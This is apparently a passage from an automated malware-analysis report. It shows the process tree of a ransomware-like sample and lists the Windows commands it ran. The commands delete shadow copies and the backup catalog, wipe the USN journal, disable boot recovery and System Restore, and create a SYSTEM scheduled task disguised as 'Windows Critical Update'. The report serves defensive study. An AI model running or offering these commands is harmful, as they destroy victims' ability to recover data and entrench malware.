    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    3⤵
    PID:4428
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:4000
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:1512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:1516
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:1588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe" /F
  2⤵
  PID:2172
- - C:\Windows\system32\schtasks.exe
    SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  PID:4012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  2⤵
  PID:4108
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  PID:2012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  PID:820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  PID:2084
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  2⤵
  PID:2932
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  PID:4980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  2⤵
  PID:4376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  2⤵
  PID:4864
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  2⤵
  PID:1688
- - C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    3⤵
    PID:3256